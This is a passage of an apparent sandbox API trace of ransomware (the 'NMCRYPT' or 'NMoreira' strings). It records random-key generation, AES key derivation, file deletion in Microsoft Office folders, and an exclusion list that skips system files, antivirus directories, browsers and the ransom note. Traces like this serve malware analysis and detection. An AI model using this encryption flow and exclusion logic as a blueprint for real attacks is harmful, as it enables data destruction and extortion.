dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.175] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0173.175] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.175] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad638) returned 1 [0173.175] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.175] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.175] wcslen (_String="\\\\?\\") returned 0x4 [0173.219] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 1 [0173.219] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 1 [0173.220] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0173.220] wcslen (_String="OK") returned 0x2 [0173.220] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.220] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.220] CryptDestroyKey (hKey=0x9ad638) returned 1 [0173.220] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0173.220] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.220] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.221] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.221] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.221] strlen (_Str="NMoreira") returned 0x8 [0173.223] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0173.223] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.224] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad4f8) returned 1 [0173.224] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.224] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.224] wcslen (_String="\\\\?\\") returned 0x4 [0173.443] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 1 [0173.443] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 1 [0173.448] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0173.448] wcslen (_String="OK") returned 0x2 [0173.448] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.448] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.448] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0173.448] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0173.448] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.448] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.449] PathMatchSpecW (pszFile="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.449] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.449] strlen (_Str="NMoreira") returned 0x8 [0173.451] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0173.451] CryptHashData (hHash=0x9ad278, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.451] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad178) returned 1 [0173.451] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.451] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.451] wcslen (_String="\\\\?\\") returned 0x4 [0173.454] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 1 [0173.455] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 1 [0173.456] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0173.456] wcslen (_String="OK") returned 0x2 [0173.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.456] CryptDestroyKey (hKey=0x9ad178) returned 1 [0173.456] CryptDestroyHash (hHash=0x9ad278) returned 1 [0173.456] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", 